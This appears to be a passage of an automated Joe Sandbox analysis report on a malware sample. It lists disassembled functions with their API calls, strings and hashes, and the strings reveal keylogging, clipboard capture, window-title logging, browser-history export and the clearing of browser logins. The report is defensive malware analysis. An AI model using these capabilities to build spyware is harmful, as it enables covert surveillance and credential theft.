Opcode Fuzzy Hash: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
Instruction Fuzzy Hash: 05E03972600308BBDB209FA09D05FEA7B6CEF04B62F1141A5BF09A6591D2758E14A7A8

Function 004013F2 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013FC
GetProcAddress.KERNEL32(00000000), ref: 00401403

Strings

User32.dll, xrefs: 004013F7
GetCursorInfo, xrefs: 004013F2

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: GetCursorInfo$User32.dll
API String ID: 1646373207-2714051624
Opcode ID: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
Instruction ID: b28a71f0ab0cd05a0e9183a6667f806437ada0decc35e30242c3667109896680
Opcode Fuzzy Hash: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
Instruction Fuzzy Hash: 8BB09BB5741301BB8A017B705E0D905357C550470375102A3B00386161F7F44500C61E

Function 00401497 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014A1
GetProcAddress.KERNEL32(00000000), ref: 004014A8

Strings

GetLastInputInfo, xrefs: 00401497
User32.dll, xrefs: 0040149C

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetLastInputInfo$User32.dll
API String ID: 2574300362-1519888992
Opcode ID: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
Instruction ID: 9c97512ccc3e9dae7fbe55962af9901819d65f6a69b3e33b2a0b565c767961ff
Opcode Fuzzy Hash: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
Instruction Fuzzy Hash: 51B092B1980302AB8E006FB1AE0DE043AB8A604703B5102B6B00292161EAF99440CF2E

Function 00448C13 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00448C9E
__alldvrm.LIBCMT ref: 00448E9F
__alldvrm.LIBCMT ref: 00448EC1

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: ffe43cf3e465c727d5e0953a870d72e00f4610d42b915cf7dfa75284df7637f7
Instruction ID: 8a3f88530d83194aa24a517e4ef6e15a272d99a70002873db7a8ab856bdac54d
Opcode Fuzzy Hash: ffe43cf3e465c727d5e0953a870d72e00f4610d42b915cf7dfa75284df7637f7
Instruction Fuzzy Hash: 18A12572A012869FFB21CE18C8817AEBBA1EF65314F24416FE5859B382CA3C8941C759

Function 0043FD01 Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
Instruction ID: c1abd53b49e6a7723cad7358b49d7c046164203d86e3a19123cc85c40c5f12b7
Opcode Fuzzy Hash: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
Instruction Fuzzy Hash: 93412871E00704AFD7249F79CC46B5A7BA9EB8C714F10523FF142DB681D37999498788

Function 00404CA3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00471EE8), ref: 00404D93
CreateThread.KERNEL32(00000000,00000000,?,00471E90,00000000,00000000), ref: 00404DA7
WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DB2
CloseHandle.KERNEL32(?,?,00000000), ref: 00404DBB

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID:
API String ID: 3360349984-0
Opcode ID: 4507b0ab51a6c89f5a00a7e6d16978d5bd04c0451300ea21d68f1003f035869f
Instruction ID: 0d5bef4af40d9751d8a4c840d6feadb85822b330c50e1cee3accc81e25362d00
Opcode Fuzzy Hash: 4507b0ab51a6c89f5a00a7e6d16978d5bd04c0451300ea21d68f1003f035869f
Instruction Fuzzy Hash: DA4194712083016FCB11FB61CD55D6FB7EDAFD4314F400A3EB982A32E2DB7899098666

Function 0040AF4D Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 0040AF62
Sleep.KERNEL32(00001388), ref: 0040AFEA

Strings

[Cleared browsers logins and cookies.], xrefs: 0040B025
Cleared browsers logins and cookies., xrefs: 0040B036

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
API String ID: 3472027048-1236744412
Opcode ID: c5625c41e3350cd44f31e3f39ca14d3df05c6bc0ef5032128f41299be6cd647b
Instruction ID: 9e673e540e653d5dfc9c41bfd33b173fe745421aa21f598ea7623546fa890e2b
Opcode Fuzzy Hash: c5625c41e3350cd44f31e3f39ca14d3df05c6bc0ef5032128f41299be6cd647b
Instruction Fuzzy Hash: EE31A24074C3826EDA11BBB555267EF6B924A53758F0844BFF8C42B3C3D9BA4818936F

Function 00411140 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128

Sleep.KERNEL32(00000BB8), ref: 004111DF

Strings

H"G, xrefs: 00411163
!G, xrefs: 00411155
exepath, xrefs: 00411168, 004111A8, 00411229

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: CloseOpenQuerySleepValue
String ID: H"G$exepath$!G
API String ID: 4119054056-2148977334
Opcode ID: b63ef4792b0a54595826799ca09291a4a0f263f6c30614dda09e5540f09a92a9
Instruction ID: cc1704131a0fe244d5c58522e2247ad29464f3afd50ace533094a5add093a815
Opcode Fuzzy Hash: b63ef4792b0a54595826799ca09291a4a0f263f6c30614dda09e5540f09a92a9
Instruction Fuzzy Hash: 2321F7A1B0030426DA00B7765D56AAF724D8B84308F00447FBE46F72E3DEBC9D0981AD

Function 004094FF Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 81sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A2DB: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A2EB
Part of subcall function 0041A2DB: GetWindowTextLengthW.USER32(00000000), ref: 0041A2F4
Part of subcall function 0041A2DB: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041A31E

Sleep.KERNEL32(000001F4), ref: 0040955A
Sleep.KERNEL32(00000064), ref: 004095F5

Strings

[ , xrefs: 00409576
], xrefs: 00409562

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Window$SleepText$ForegroundLength
String ID: [ $ ]
API String ID: 3309952895-93608704
Opcode ID: 1543f2ebe3b39a11f32b2ab7ee3d2400f3e72a61424cc91a421d40b22e495c0c
Instruction ID: f130b1bb1348f748448b569433b56ba5176942d51498ef551544d7c0cb15bd34
Opcode Fuzzy Hash: 1543f2ebe3b39a11f32b2ab7ee3d2400f3e72a61424cc91a421d40b22e495c0c
Instruction Fuzzy Hash: 2721657160420067C618B776DC179AE32A89F51308F40447FF552772D3EE7D9A05869F

Function 00440F33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87cf1a99992dac899311e5f70d4e339ac3b3345b823034c77296a488e3312c11
Instruction ID: cddd12244c82da27d8fba5a3cfb3b4b8374ea1530061808fe1103b2c2b1f06f2
Opcode Fuzzy Hash: 87cf1a99992dac899311e5f70d4e339ac3b3345b823034c77296a488e3312c11
Instruction Fuzzy Hash: 46018FB26092163EF6302E796CC1F67271CDF517B9B21033BF625622D2EAB8CD254568

Function 00440FB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a806abc81d082e1cec901e4614177c074956c5300ea34d23f617e0004ee84c8
Instruction ID: ded37596ea74bb71ca552df42b40a6491f306b500b676c7390fdbb9d5d89f826
Opcode Fuzzy Hash: 0a806abc81d082e1cec901e4614177c074956c5300ea34d23f617e0004ee84c8
Instruction Fuzzy Hash: E801D1B220A2163EB6202E796CC9D27631DEF513BE725033BF521522E6EF7DCC855168

Function 0041A20F Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A23C
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A261
CloseHandle.KERNEL32(00000000,?,00000000,0040410F,00462E24), ref: 0041A26F

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
Instruction ID: 89bb00dd3d40589ea0a8ab1c68f17f151e0eed20b013a8aeca2898ab58bcd068
Opcode Fuzzy Hash: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
Instruction Fuzzy Hash: 6EF0F6B13023087FE6102B21AC84FBF369CDB867A5F01027EF901A32C1CA3A8C054536

Function 00436CD1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00436CD1
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00436CD6
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00436CDB

Part of subcall function 004381DA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004381EB

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00436CF0

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
Instruction ID: fe0629a2579d5eb29aad24ff52ac89f8c4d28ee3f0e2161d733d9faf058f7893
Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
Instruction Fuzzy Hash: 12C00254040342742C5077B622062AEA350A8AE38DFA7B4CFB892171038D0D440B953F

Function 0044015D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 004401ED

Strings

pow, xrefs: 004401C5, 004401E2

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
Instruction ID: 9a83a7e01686381b8a8ce0b853cf5bc52d75b03c70b61edc7fb1f4b11142e615
Opcode Fuzzy Hash: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
Instruction Fuzzy Hash: 21518A60A842018AFB117714CA4137B3B90EB40701F248DABE5D2563EAEB7D8CB5DA4F

Function 0044C2F9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 0044BECC: GetOEMCP.KERNEL32(00000000,?,?,0044C155,?), ref: 0044BEF7

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044C19A,?,00000000), ref: 0044C36D
GetCPInfo.KERNEL32(00000000,0044C19A,?,?,?,0044C19A,?,00000000), ref: 0044C380

Strings

e]j[/, xrefs: 0044C301

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID: e]j[/
API String ID: 546120528-424226671
Opcode ID: a1d638a847ca5887dfafff9ef9072a4d64dd1dea4364b16033eb6130c8603d10
Instruction ID: 39d3b51f78fa3dc51bf46926ac48678e3518d9e5a4157be134808b0317445e48
Opcode Fuzzy Hash: a1d638a847ca5887dfafff9ef9072a4d64dd1dea4364b16033eb6130c8603d10
Instruction Fuzzy Hash: 575146709016059EFB608F32C9D16BBBBE5EF45304F18806FD4868B251EB3CD942CB99

Function 0044BFA4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044BFC9

Strings

e]j[/, xrefs: 0044BFAF
, xrefs: 0044C00E

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Info
String ID: $e]j[/
API String ID: 1807457897-294091184
Opcode ID: cf814dcea66d547d5511fe6abea725c5afb0c6c581699f65c0a6ef2232fc43f5
Instruction ID: a9031e0b719ca4809571b2dd5a5a2878ac6bbfa49f3fb547c71a4f54ad12fa7b
Opcode Fuzzy Hash: cf814dcea66d547d5511fe6abea725c5afb0c6c581699f65c0a6ef2232fc43f5
Instruction Fuzzy Hash: 70413A705053489AEB218E688DC4AF7BBA9DB45308F1804EEE58A87143D2399E46DF24

Function 0043FA09 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130fileCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043FA50
ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 0043FAD0

Strings

e]j[/, xrefs: 0043FA18

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: FileReadUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: e]j[/
API String ID: 1834446548-424226671
Opcode ID: 21e011ff5c770e81468736c50d7e45a864eeb2f96e6d304dcbc785cf4927324c
Instruction ID: 995607b62a38843ce399ffd975ea190ea598faf6a1fec1d62ce04ce772d4fc78
Opcode Fuzzy Hash: 21e011ff5c770e81468736c50d7e45a864eeb2f96e6d304dcbc785cf4927324c
Instruction Fuzzy Hash: 94412671E001589BDB20DF64CC90BE9B3A6EB4C304F5091FBE5498B241D779ADCA8B59

Function 0040402C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404046

Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980

Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5

Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228

Sleep.KERNEL32(000000FA,00462E24), ref: 00404118

Strings

/sort "Visit Time" /stext ", xrefs: 00404092

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
String ID: /sort "Visit Time" /stext "
API String ID: 368326130-1573945896
Opcode ID: a4a6769404a45eb771fb951e36bc417e5ca480f2d31eb92d27795bae4adf2828
Instruction ID: 7f8942f24ccac46b0034012f494d3192eca769648d2eef92b07e1d28e9d76a7f
Opcode Fuzzy Hash: a4a6769404a45eb771fb951e36bc417e5ca480f2d31eb92d27795bae4adf2828
Instruction Fuzzy Hash: B5316431A0021556CB14FBB6DC969EE73B9AF90308F40017FF506B71E2EE38594ACA99

Function 0040A694 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B

__Init_thread_footer.LIBCMT ref: 0040A6E3

Strings

[End of clipboard], xrefs: 0040A725
[Text copied to clipboard], xrefs: 0040A732

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Init_thread_footer__onexit
String ID: [End of clipboard]$[Text copied to clipboard]
API String ID: 1881088180-3686566968
Opcode ID: 8b3756b0909f45d78d669578ef8912b34d58c84c6c9fb6c8f8edd64ed624e4fc
Instruction ID: 89f5e7c07999504d217297f9a041c68b3e0b8c5632e5b70e4a6c966e9d45e494
Opcode Fuzzy Hash: 8b3756b0909f45d78d669578ef8912b34d58c84c6c9fb6c8f8edd64ed624e4fc
Instruction Fuzzy Hash: 42218D31A002055ACB04FBA5D892DEDB378AF54308F10453FF506771D2EF38AE4A8A8D

Function 0044ED17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002), ref: 0044EDF2

Strings

ACP, xrefs: 0044ED35
OCP, xrefs: 0044ED6B

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
Instruction ID: ce4b6ecbf16ce97eee8671cf775368e41a8ae942868fb71505acbacd33d5bec2
Opcode Fuzzy Hash: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
Instruction Fuzzy Hash: 4F21F1E2E00102A2FB348B67CC01BAB72A6FF54B51F568426E90AD7300EB3ADD41C35C

Function 00415B11 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82windowCOMMON

Download Yara Rule

APIs

GetWindowTextW.USER32(?,?,0000012C), ref: 00415B2E
IsWindowVisible.USER32(?), ref: 00415B37

Strings

(%G, xrefs: 00415BDC

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Window$TextVisible
String ID: (%G
API String ID: 1670992164-3377777310
Opcode ID: 6f17d284cfdb4df53722abd5a13ccbba9f2a9602f3f7b51a6171a740e00953ec
Instruction ID: 7bdbcb6602ffb42e5ce2137d58ff1a132c15f169860b2e192372582f8912ca7a
Opcode Fuzzy Hash: 6f17d284cfdb4df53722abd5a13ccbba9f2a9602f3f7b51a6171a740e00953ec
Instruction Fuzzy Hash: E42166315182019BC314FB61D891EEFB7E9AF94304F50493FF49A920E2FF349A49CA5A

Function 00447ACC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00447F09,00453EB5,00000000,00000000,00000000,00000000,00000000), ref: 00447B76
GetLastError.KERNEL32(?,00447F09,00453EB5,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00447B9F

Strings

e]j[/, xrefs: 00447ADB

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID: e]j[/
API String ID: 442123175-424226671
Opcode ID: 0f79828fc8b0c5cb440bc5d9103ed182d1359841b9fc0231dfc75513fd6972b2
Instruction ID: d19c1fef3488fb7a471064a755fd549315a9797d1f14dd1dc6ec93a92155b046
Opcode Fuzzy Hash: 0f79828fc8b0c5cb440bc5d9103ed182d1359841b9fc0231dfc75513fd6972b2
Instruction Fuzzy Hash: 28318271B002199BCB24DF5ADD809DAF3F9EF88315F2044ABE909D7251E734AD86CB58

Function 004479ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00447F29,00453EB5,00000000,00000000,00000000,00000000,00000000), ref: 00447A88
GetLastError.KERNEL32(?,00447F29,00453EB5,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00447AB1

Strings

e]j[/, xrefs: 004479FC

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID: e]j[/
API String ID: 442123175-424226671
Opcode ID: 8971ae2eb844da5a37c84aec88c36d5513e2cabcc6460dd0ef09e837a7770667
Instruction ID: 5d2fcbea9ef9280db9bba75f749e4cd58e2ae6f4ee6b3edd0a569712a4e008e6
Opcode Fuzzy Hash: 8971ae2eb844da5a37c84aec88c36d5513e2cabcc6460dd0ef09e837a7770667
Instruction Fuzzy Hash: 6F21B435A04219DFDB14CF69DD80AEDB3F4EB48301F1044AAE94AD7251D774AE86CF64

Function 00404FD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405010

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405067

Strings

Connection KeepAlive | Enabled | Timeout: , xrefs: 00404FFF

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: Connection KeepAlive | Enabled | Timeout:
API String ID: 481472006-507513762
Opcode ID: db71296423f5ae0c940390bca2fe76bdaa24d7f5692d89ec5d6dad89ab0214d4
Instruction ID: 0beb7a88d254a358a963561f9d97893b624dd36ca90e96b80d49a5b3b1f878f3
Opcode Fuzzy Hash: db71296423f5ae0c940390bca2fe76bdaa24d7f5692d89ec5d6dad89ab0214d4
Instruction Fuzzy Hash: 092137719042406BD304B7219D2976F7794A745308F04047EF845132E2DBBD5988CB9F

Function 004194DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(00000000), ref: 004194F4

Strings

| , xrefs: 00419527
%02i:%02i:%02i:%03i , xrefs: 00419509

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: | $%02i:%02i:%02i:%03i
API String ID: 481472006-2430845779
Opcode ID: 3ac86647c9e14ca6f93bd036f528b1de7b867f3a903355216a00816ff0bb3ae2
Instruction ID: bce8772fa89f7f7ff9e68bb522557632f538b64cb503c22793e2f51f4d03e72f
Opcode Fuzzy Hash: 3ac86647c9e14ca6f93bd036f528b1de7b867f3a903355216a00816ff0bb3ae2
Instruction Fuzzy Hash: 68117F315042015AC304FBA5D8518EBB3E8AB94308F500A3FF895A21E2FF3CDA49C65A

Function 00418CCD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,00000000,?,?,?,?,?,00415594,00000000), ref: 00418CF2

Strings

x(G, xrefs: 00418CFC
alarm.wav, xrefs: 00418CDD

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: alarm.wav$x(G
API String ID: 1174141254-2413638199
Opcode ID: 26c40b3e06d19070c32931467931773a754d599fffa5f8131170b201d030b6b4
Instruction ID: fe962266bcbe9b481af3baecc2186877703bd5259ecc619923a55b1e0e4c82aa
Opcode Fuzzy Hash: 26c40b3e06d19070c32931467931773a754d599fffa5f8131170b201d030b6b4
Instruction Fuzzy Hash: 40019270B0430056C604F7A6E9566EE37958BA1358F00857FA849672E2EEBD4D45C6CF

Function 00409F9A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

CloseHandle.KERNEL32(?), ref: 00409FFD
UnhookWindowsHookEx.USER32 ref: 0040A010

Strings

Online Keylogger Stopped, xrefs: 00409FAA, 00409FB2, 00409FD9

Memory Dump Source

